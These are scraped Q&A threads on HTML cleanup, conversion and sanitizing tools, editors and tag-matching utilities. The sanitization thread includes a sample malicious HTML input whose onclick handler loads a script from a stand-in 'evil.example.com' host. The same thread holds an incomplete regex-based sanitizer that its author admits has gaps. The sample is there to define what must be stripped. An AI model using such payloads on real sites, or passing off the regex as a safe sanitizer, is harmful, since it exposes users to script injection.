Recommended HTML formatter script/utility? [closed] - html

As it currently stands, this question is not a good fit for our Q&A format. We expect answers to be supported by facts, references, or expertise, but this question will likely solicit debate, arguments, polling, or extended discussion. If you feel that this question can be improved and possibly reopened, visit the help center for guidance.
Closed 9 years ago.
Simple question - I've got a bucketload of cruddy html pages to clean up and I'm looking for a open source or freeware script/utility to remove any junk and reformat them into nicely laid out consistent code. Any recommendations?
If it's relevant I generally manipulate HTML inside Dreamweaver - but by editing the code and using the wysiwyg window as preview rather than vica-versa - so a Dreamweaver compatible script would be a plus.

I don't think it plugs into Dreamweaver but whenever i need html cleaned up HTML Tidy is my go to guy

I second HTML Tidy.
I just wanted to add it is a library with various ports and bindings. As such it is also integrated in some editors like HTML-Kit or NoteTab, and it has a GUI front end. All these are linked in the page given above.
Note also that the W3C Markup Validation Service has an option to "Clean up Markup with HTML Tidy" (after validation result display).

Dreamweaver CS3 has a built in "Clean up HTML" choice under the "Commands" menu item. I don't think it is nearly as comprehensive as HTML Tidy though.
From the Adobe site:
Clean up code
You can automatically remove empty tags, combine nested font tags, and otherwise improve messy or unreadable HTML or XHTML code.
For information on how to clean up HTML generated from a Microsoft Word document, see Open and edit existing documents.
Open a document:
If the document is in HTML, select Commands > Clean Up HTML.
If the document is in XHTML, select Commands > Clean Up XHTML. -- For an XHTML document, the Clean Up XHTML command fixes XHTML syntax errors, sets the case of tag attributes to lowercase, and adds or reports the missing required attributes for a tag in addition to performing the HTML cleanup operations.
In the dialog box that appears, select any of the options, and click OK. -- Note: Depending on the size of your document and the number of options selected, it may take several seconds to complete the cleanup.
Remove Empty Container Tags Removes any tags that have no content between them. For example, <b></b> and <font color="#FF0000"></font> are empty tags, but the &ly;b> tag in &ltb>some text</b> is not.
Remove Redundant Nested Tags Removes all redundant instances of a tag. For example, in the code <b>This is what I <b>really</b> wanted to say</b>, the b tags surrounding the word really are redundant and would be removed.
Remove Non-Dreamweaver HTML Comments Removes all comments that were not inserted by Dreamweaver. For example, <!--begin body text--> would be removed, but <!-- TemplateBeginEditable name="doctitle" --> wouldn’t, because it’s a Dreamweaver comment that marks the beginning of an editable region in a template.
Remove Dreamweaver Special Markup Removes comments that Dreamweaver adds to code to allow documents to be automatically updated when templates and library items are updated. If you select this option when cleaning up code in a template-based document, the document is detached from the template. For more information, see Detach a document from a template.
Remove Specific Tag(s) Removes the tags specified in the adjacent text box. Use this option to remove custom tags inserted by other visual editors and other tags that you don’t want to appear on your site (for example, blink). Separate multiple tags with commas (for example, font,blink).
Combine Nested <font> Tags When Possible Consolidates two or more font tags when they control the same range of text. For example, <font size="7"><font color="#FF0000">big red</font></font> would be changed to <font size="7" color="#FF0000">big red</font>.
Show Log On Completion Displays an alert box with details about the changes made to the document as soon as the cleanup is finished.

I use the HTML Formatter...it does exactly what you are looking for.

I definitely think the best tool out there is the HTML Formatter from Logichammer.com. It does exactly what you need and is dead simple to use. Worth it to check out...the guy even has a video on his site showing how easy it is to use. I've been using it for two years now and couldn't live with out it...I get lots of messy code.

I use Cleanup HTML it does the job well cleaning and formatting HTML

I would suggest purehtml.in...it beautifies html, style and JavaScript tags...

You can even buffer your existing HTML through HTML Tidy before it reaches the browser - if it's a low traffic site, then this will make things neat without any effort.

I too recommend HTML Tidy, whilst its not maintained by Dave Ragett anymore the tool is definitely being updated frequently with tweaks.
I use HTML Trim which is a win32 app to cleanup some awful autogenerated blobs of code that some of our devs knock up.
You can also grab the command line version which you may able to integrate into Dreamweaver.
Sorry i cant post more than one hyperlink - still a n00b here.

I've been using Polystyle for a long time, and I'm quite happy. It's fairly flexible about formatting rules and costs around $15. A trial version is available.

I would recommend vim. You could format a block of code with v to select the block and '=' to indent the code.

Related

Preserving custom made word styles in word html

I have to make a release notes document in word based on an xml export from Jira.
Some of the fields that we need in the release notes document are rich text enabled. In reality the output is html styled text.
To be able to mix the html text and the plain text from Jira, we opted to use the word html (save a word document as web page) as a template.
Then we use xslt to add the needed values from the xml export into the word html template.
This seems to be working quite ok, but we ran into a problem.
The release notes format in word has a lot of styles (some of them are custom build)
But in the document we get when opening the transformed file (thus technically HTML) we only get 2 styles: Normal and heading1
(I prepared 2 screenshots, but I can't post images yet)
My question now is:
Is there a way to add these styles to the word html part so these can still be used by our users to edit the document after it is generated.
I thought there had to be something I could add here to insert these styles. But I can't seem to figure out what.
there is a style part in the html, so that is what I primarily have been looking at.
any help would be appreciated. Even if you just point me to some documentation about word html, or to someone who might know this.
Kind regards
Peter
As an alternative approach, you could consider docx4j.XHTMLImport.
If your incoming XHTML contains #class values with the same names as styles in the target docx, then the converted content will use those styles.

Stripping HTML but retaining block/inline structure

I would like to convert HTML to plain text but retain the minimum structure.
All sections which contain stuff only the browser needs to see such as <script> and <style> to be stripped completely.
Convert all block tags to <div> and all inline ones to <span> or remove inlines completely without leaving whitespace and turning anything delineatd by block levels into paragraphs with two linebreaks.
The idea is to turn random web pages into something suitable for natural language text processing without artefacts left from naively removing markup artifically break words up or making unrelated blocks look like sentences.
Any binary, library, or source in any programming language is OK.
Is there a standard source preferably machine-readable with a full list of elements defining which are block, which inline, and which are like <script> and <style> above?
The list of HTML 4 Block-level elements is here: http://htmlhelp.com/reference/html40/block.html
The most popular HTML parsing libraries for Perl are HTML::Parser which is a SAX-style parser and HTML::TreeBuilder which is more DOM-like.
Beyond that, you'll have to decide which elements are important and which are not based on what you're trying do to.
You may want to do some research yourself. Then, when you run into a problem, ask a question related to the problem. This sounds more like specification for a project that you want someone to do for you.
For starters, websites use tags for all sorts of things, and the problem is very complex. You would probably want to save information in h# and p tags, but you also may want to save div tag information if they use the id tag. In short, you'd have to write rules for each website you encounter, or employ some sort of fuzzy logic.
Instead of doing it on a tag by tag basis, why not try detecting sentences and grammar, or things likely to be in headings, and choose tags that include those things while stripping out the rest?
Here's my own tool to solve this problem in Perl using HTML::Parser as a github gist: html2txt.pl
It's unfinished and perhaps slightly Windows-centric but I thought I'd share it since a few people have viewed my question here. Feel free to play with it.

What can I use to sanitize received HTML while retaining basic formatting?

This is a common problem, I'm hoping it's been thoroughly solved for me.
In a system I'm doing for a client, we want to accept HTML from untrusted sources (HTML-formatted email and also HTML files), sanitize it so it doesn't have any scripting, links to external resources, and other security/etc. issues; and then display it safely while not losing the basic formatting. E.g., much as an email client would do with HTML-formatted email, but ideally without repeating the 347,821 mistakes that have been made (so far) in that arena. :-)
The goal is to end up with something we'd feel comfortable displaying to internal users via an iframe in our own web interface, or via the WebBrowser class in a .Net Windows Forms app (which seems to be no safer, possibly less so), etc. Example below.
We recognize that some of this may well muck up the display of the text; that's okay.
We'll be sanitizing the HTML on receipt and storing the sanitized version (don't worry about the storage part — SQL injection and the like — we've got that bit covered).
The software will need to run on Windows Server. COM DLL or .Net assembly preferred. FOSS markedly preferred, but not a deal-breaker.
What I've found so far:
The AntiSamy.Net project (but it appears to no longer be under active development, being over a year behind the main — and active — AntiSamy Java project).
Some code from our very own Jeff Atwood, circa three years ago (gee, I wonder what he was doing...).
The HTML Agility Pack (used by the AntiSamy.Net project above), which would give me a robust parser; then I could implement my own logic for walking through the resulting DOM and filtering out anything I didn't whitelist. The agility pack looks really great, but I'd be relying on my own whitelist rather than reusing a wheel that someone's already invented, so that's a ding against it.
The Microsoft Anti-XSS library
What would you recommend for this task? One of the above? Something else?
For example, we want to remove things like:
script elements
link, img, and such elements that reach out to external resources (probably replace img with the text "[image removed]" or some such)
embed, object, applet, audio, video, and other tags that try to create objects
onclick and similar DOM0 event handler script code
hrefs on a elements that trigger code (even links we think are okay we may well turn into plaintext that users have to intentionally copy and paste into a browser).
__________ (the 722 things I haven't thought of that are the reason I'm looking to leverage something that already exists)
So for instance, this HTML:
<!DOCTYPE html>
<html>
<head>
<title>Example</title>
<link rel="stylesheet" type="text/css" href="http://evil.example.com/tracker.css">
</head>
<body>
<p onclick="(function() { var s = document.createElement('script'); s.src = 'http://evil.example.com/scriptattack.js'; document.body.appendChild(s);)();">
<strong>Hi there!</strong> Here's my nefarious tracker image:
<img src='http://evil.example.com/xparent.gif'>
</p>
</body>
</html>
would become
<!DOCTYPE html>
<html>
<head>
<title>Example</title>
</head>
<body>
<p>
<strong>Hi there!</strong> Here's my nefarious tracker image:
[image removed]
</p>
</body>
</html>
(Note we removed the link and the onclick entirely, and replaced the img with a placeholder. This is just a small subset of what we figure we'll need to strip out.)
This is an older, but still relevant question.
We are using the HtmlSanitizer .Net library, which:
is open-source
is actively maintained
doesn't have the problems like Microsoft Anti-XSS library,
Is unit tested with the
OWASP XSS Filter Evasion Cheat Sheet
is special built for this (in contrast to HTML Agility Pack, which is a parser)
Also on NuGet
I am sensing you would definately need a parser that can generate a XML/DOM source so that you can apply fiter on it to produce what you are looking for.
See if HtmlTidy or Mozilla or HtmlCleaner parsers can help. HtmlCleaner has lot of configurable options which you might also want to look at. Specifically the transform section that allows you to skip the tags you doesn't require.
I would suggest using another approach. If you control the method in which the HTML is viewed I would remove all threats by using a HTML render that doesn't have a ECMA script engine, or any XSS capability. I see you are going to use the built-in WebBrowser object, and rightly so, you want to produce HTML that cannot be used to attack your users.
I recommend looking for a basic HTML display engine. One that cannot parse or understand any of the scripting functionality that would make you vulnerable. All the javascript would just be ignored then.
This does have another problem though. You would need to ensure that the viewer you are using isn't susceptible to other types of attacks.
I suggest looking at http://htmlpurifier.org/. Their library is pretty complete.
Interesting problem, i took some time facing it because there are a lot of things we want to remove from user imput, and even if i do a long list of things to be removed, latter on HTML can evolve and my list would have some holes.
Nonetheless i want users to input some simple things like bold, italic, paragraphs... prety simple.
No doubts the allowed things list is shorter and html can change latter on, that wont make holes on my list unless html stops supports this simple things.
So start thinking otherwise, say just what you allow, with great pain because i'm not an expert on regex (so please some regex people correct me here or improve) i coded this expression and its working form me even before HTML5 arrive.
replace(/(?!<[/]?(b|i|p|br)(\s[^<]*>|[/]>|>))<[^>]*>/gi,"")
(b|i|p|br) <- this is the list of allowed tags, feel free to add some.
this is a startpoint and thats why some regex people should improve to remove also the attributes, like onclick
if i do this:
(?!<[/]?(b|i|p|br)(\s*>|[/]>|>))<[^>]*>
tags with onclick or other stuff will be removed but the corresponding closing tags will remain, and after all we don't want those tags removed we just want to remove the tag attributes.
maybe a second regex pass with
(?!<[^<>\s]+)\s[^</>]+(?=[/>])
am i right? can this be composed into a single pass?
we still have no relation between tags (opening/closing), no great deal till now.
Can the attribute remove be write to remove all not from a white lists? (possibly yes).
a last problem.. when removing tags like script the content remains, its desirable when removing font but not script, well we can do a first pass with
<(script|object|embed)[^>]*>.*</\1>
that will remove certain tags and its content.. but its a black list, meaning you have to keep an eye on it in case html changes.
note: all with "gi"
edit:
joined all the above on this function
String.prototype.sanitizeHTML=function (white,black) {
if (!white) white="b|i|p|br";//allowed tags
if (!black) black="script|object|embed";//complete remove tags
e=new RegExp("(<("+black+")[^>]*>.*</\\2>|(?!<[/]?("+white+")(\\s[^<]*>|[/]>|>))<[^<>]*>|(?!<[^<>\\s]+)\\s[^</>]+(?=[/>]))", "gi");
return this.replace(e,"");
}
-black list -> complete remove tag and content
-white list -> retain tags
other tags are removed but tag content is retained
all attributes of white list tag's (the remaining ones) are removed
still there is place for a white list of attributes (not implemented above) because if i want to preserve IMG then the src must stay... and what about tracking images?

WYSIWYG browser editor that generates *good* HTML?

I'm searching for a "suck less" WYSIWYG in-browser X?HTML editor that generates good HTML code.
(no <font>, <foo style="...">, <p></p><span></span><p><span> </span><span><span>blah</span></<span></p> and so on -- <b> and <i> etc is ok).
Should be easy-to-use as it is going to be used by people that do not know what HTML is.
Any suggestions?
Extra points for Copy-and-Paste-from-Word-readiness! :-)
(I found a lot of editors but they all create that <font> and nested <span> crap that breaks site design and bloats a site with one table up to 100kB.)
Download the current version of CKEditor and look at the XHTML output sample. It shows how to use full WYSIWYG but it doesn't generates font or styles. You just need to adjust the configuration to your needs.
What about WYMEditor?
WYMeditor has been created to generate perfectly structured XHTML strict code, to conform to the W3C XHTML specifications and to facilitate further processing by modern applications.
With WYMeditor, the code can't be contaminated by visual informations like font styles and weights, borders, colors, ... The end-user defines content meaning, which will determine its aspect by the use of style sheets. The result is easy and quick maintenance of information.
I've used it a little and while it takes quite a bit of tweaking if you have very specific needs, it does work out of the box for simple XHTML editing. If you set up specially annotated CSS files then it will detect the styles you want users to use and block level elements to which they apply. You can also tell it how to display these styles in the editor (which might be different from how you want them displayed in the resulting XHTML).
Of course, it generates XHTML, not HTML, so it may not meet your exact needs.
Wikipedia has a category for them:
http://en.wikipedia.org/wiki/Category:JavaScript-based_HTML_editors
You can use Markdown with the WMD UI, it's the one used by Stack Overflow. It always produces valid HTML code.
I just recently searched for an editor to create solid documentation, whose output is suitable for Subversion diffs: https://superuser.com/questions/126621/wysiwyg-editor-for-structured-text-suitable-for-svn-versioning
The editor that was suggested - "KompoZer" - turned out to be fantastic, especially because it generates very clean HTML (in my opinion). And I say that, although I had originally preferred something leaner than HTML.
P.S. Reading your question again, I'm not sure, what you mean with a "browser editor" - are you looking for an editor that can be integrated in an HTML page? KompoZer is based on a browser, but it can probably not be integrated in an HTML page.
I recently switched one of my projects to markdown to avoid this exact issue. There's still a bit of a learning curve for the users but I haven't had to deal with the usual issues that occur when they copy/paste content from Word and wonder why it blew up.
Having said that, I prefer CKEditor over TinyMCE and the Telerik controls. I've generally found it generates somewhat cleaner HTML.
There are several WYSIWG editors for embedding within your website out there.
WYMeditor (http://www.wymeditor.org/) looks very nice and seems to be a good fit for targetting clean and valid XHTML results.
Spaw2. Although it's kinda abandoned now.
The Apple Cocoa NSTextView class exports quite nice html, where all the fiddling is done through specifying a style sheet in the header. The Apple TextEdit editor uses this.
http://tinymce.moxiecode.com/ - easy to use, can import form Word, and restrict formatting to predefined CSS styles, to provide consistent output.
This post is 8+ years old now but still relevant...
I found an awesome github page with a curated list of WYSIWYG editors, including a few WYSIWYM ones which guarantee sane html. As of 2018, the most current and best WYSIWYM one looks like ProseMirror, or maybe ORY Editor if you're looking for something to edit entire webpages(!) in one textfield.

How do you find mismatched tags in HTML?

I've inherited some rather large static HTML files that need to be fixed up to work in webkit-based browsers, Safari in particular. One of the common bugs I've found that cause rendering differences is missing </div> tags. (Both IE7+ and FF3+ seem to ignore these, or make good guesses as to where to close the DIVs, and render as expected.) I'm used to using vim with HTML syntax highlighting for editing, but end up writing awk scripts to match starting and ending tags.
What is your favorite tool or technique for matching start and end tags in a large HTML file?
UPDATE: I'm currently in a shop that targets HTML 4.01 Strict, not XHTML.
The W3C HTML Validator works fairly well, or if you want something a little simpler then the Tidy FireFox plugin also works.
The w3c Validator can be (extremely) verbose, but it does check for missing closing tags.
HTML Tidy is a great command line tool. I often use it with WGet
Most IDE's usually let you know via highlighting, fuzzy-underline or a warning.
Div Checker is a great tool that focuses on div tags specifically.
While other tools were only able to tell me that "some tag was missing somewhere".
Div-Checker removes other tags, code, and most comments, to create a clean visual structure of just the divs themselves.
From this div map, it's fairly easy to see if nested divs are correctly paired !
I was able to locate a missing div left out by a wordpress theme developer, with the help of this tool.
Here is the Posted Answer from #noah-whitmore that enlightened me to this awesome tool.
There are a couple other useful tools mentioned in that thread as well, such as unclosed-tag-finder (visually not so easy to read, but helpful if your missing tag is not a div).
vim/gvim & NetBeans both do a great job of tag matching
What is your favorite tool or technique for matching start and end tags in a large HTML file?
A text editor with a built-in XML well-formedness checker, combined with using XHTML for everything.
Sublime Text with the Tag plugin has a Tag Lint feature which which aims to check correctness of opened and closed tags.